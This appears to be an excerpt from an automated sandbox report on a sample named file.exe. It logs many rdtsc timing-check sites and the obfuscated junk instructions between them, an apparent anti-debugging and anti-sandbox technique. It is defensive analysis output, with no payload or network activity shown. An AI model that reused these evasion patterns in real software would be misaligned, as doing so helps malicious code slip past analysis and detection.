Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4AE59 second address: D4AE63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF0BCB462B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4AE63 second address: D4AE67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4A851 second address: D4A882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C8h 0x00000007 jmp 00007FF0BCB462C5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B545 second address: D4B556 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF0BC8515D8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B556 second address: D4B569 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4B7F7 second address: D4B7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D4BAE6 second address: D4BAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D515BB second address: D515BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D515BF second address: D515DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007FF0BCB462B6h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D515DE second address: D51604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FF0BC8515D6h 0x0000000e jmp 00007FF0BC8515E8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50559 second address: D50575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnl 00007FF0BCB462B6h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007FF0BCB462B6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50575 second address: D50579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D1721C second address: D17242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF0BCB462B6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF0BCB462C4h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17242 second address: D17246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17246 second address: D17254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FF0BCB462B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D176A2 second address: D176C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF0BC8515E3h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D179B6 second address: D179FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c add dword ptr [ebp+122D1D3Ch], eax 0x00000012 mov edi, dword ptr [ebp+122D2906h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e jmp 00007FF0BCB462C7h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D179FD second address: D17A07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BC8515DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17AD2 second address: D17AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FF0BCB462C0h 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17AEE second address: D17AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17AF2 second address: D17B28 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FF0BCB462BCh 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007FF0BCB462C0h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17D35 second address: D17D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FF0BC8515E9h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17D5F second address: D17DC6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0BCB462BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jl 00007FF0BCB462BCh 0x00000011 sub edi, dword ptr [ebp+122D2BF2h] 0x00000017 mov dx, bx 0x0000001a push 00000004h 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007FF0BCB462B8h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 00000015h 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 mov dword ptr [ebp+12471713h], ecx 0x0000003c nop 0x0000003d jmp 00007FF0BCB462C7h 0x00000042 push eax 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 jbe 00007FF0BCB462B6h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D17DC6 second address: D17DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5082C second address: D5084C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FF0BCB462F5h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jnc 00007FF0BCB462B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50B0C second address: D50B10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50B10 second address: D50B21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jnc 00007FF0BCB462B6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50B21 second address: D50B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push ebx 0x00000007 jnp 00007FF0BC8515D8h 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FF0BC8515D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50B38 second address: D50B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50DE7 second address: D50DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50DED second address: D50E0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50E0E second address: D50E29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D50E29 second address: D50E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D55883 second address: D55889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D5A3B1 second address: D5A3BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FF0BCB462B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60521 second address: D60525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60525 second address: D6053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6053A second address: D6053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6080D second address: D60813 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60A94 second address: D60A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D60A9A second address: D60AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C4h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6272F second address: D62737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D654D9 second address: D654DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D654DD second address: D654E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D654E3 second address: D65504 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jno 00007FF0BCB462C5h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA3F second address: D6AA45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA45 second address: D6AA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0BCB462C5h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA60 second address: D6AA65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA65 second address: D6AA74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA74 second address: D6AA88 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FF0BC8515D8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA88 second address: D6AA94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FF0BCB462B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA94 second address: D6AA98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6AA98 second address: D6AAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FF0BCB462BCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6932F second address: D69335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6976B second address: D6976F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6976F second address: D69773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D69773 second address: D69779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D69779 second address: D69794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0BC8515DFh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D6A783 second address: D6A7A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71722 second address: D71726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71726 second address: D7172C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70628 second address: D7062E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D708EB second address: D708F7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jp 00007FF0BCB462B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70BDB second address: D70BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70E3F second address: D70E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF0BCB462B6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70E4F second address: D70E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 ja 00007FF0BC8515D6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF0BC8515E3h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D70E71 second address: D70E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71153 second address: D71157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71157 second address: D7115B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7115B second address: D71175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0BC8515DCh 0x0000000b jo 00007FF0BC8515DEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D71465 second address: D7146B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7146B second address: D7147B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FF0BC8515D6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7147B second address: D7147F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7147F second address: D71492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jne 00007FF0BC8515DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7399A second address: D739B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D74FB5 second address: D74FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D74FB9 second address: D74FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78B6B second address: D78B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78B71 second address: D78B77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77D11 second address: D77D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77D15 second address: D77D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0BCB462C7h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77EA1 second address: D77EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77EA5 second address: D77EA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D77EA9 second address: D77EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF0BC8515DAh 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D782AE second address: D782C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FF0BCB462C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7844E second address: D78465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FF0BC8515DBh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D78898 second address: D7889C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7889C second address: D788A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D86560 second address: D86566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D84D76 second address: D84D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85023 second address: D85029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D85029 second address: D85030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D855A2 second address: D855BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FF0BCB462C3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D855BD second address: D855DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D855DA second address: D855E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D863C1 second address: D863C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D863C5 second address: D863CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D863CE second address: D863E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D863E6 second address: D8640C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007FF0BCB462C7h 0x0000000c jg 00007FF0BCB462BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D8DE71 second address: D8DE7B instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0BC8515D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
